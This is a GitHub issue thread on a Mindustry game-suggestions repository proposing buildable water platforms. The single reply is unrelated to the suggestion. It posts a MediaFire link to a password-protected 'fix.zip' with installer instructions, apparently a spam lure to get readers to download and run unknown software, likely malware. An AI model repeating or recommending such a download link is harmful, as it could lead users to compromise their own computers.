### ISSUE TITLE
water platforms

### ISSUE THREAD

**Issue by Globus713** [Anuken/Mindustry-Suggestions#5193]
### Describe the content or mechanics you are proposing.

I suggest adding platforms that can be put on water and then you can put blocks on these platforms for levels on which have more water than land, the cost is 20 lead which have more water than land for accessibility at the beginning of the game, make them transparent to water units, I apologize if I wrote a lot of mistakes, I write Russian through a translator

### Describe how you think this content will improve the game. If you're proposing new content, mention how it may add more gameplay options or how it will fill a new niche.

this way it will be possible to deceive the players with the installation of defense 

### Before making this issue, check the boxes below to confirm that you have acknowledged them.

- [X] I have checked the [Trello](https://trello.com/b/aE2tcUwF/mindustry-trello) to make sure my suggestion isn't planned or implemented in a development version.
- [X] I am familiar with all the content already in the game or have glanced at the wiki to make sure my suggestion doesn't exist in the game yet.
- [X] I have read [README.md](https://github.com/Anuken/Mindustry-Suggestions/blob/master/README.md) to make sure my idea is not listed under the "A few things you shouldn't suggest" category.

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
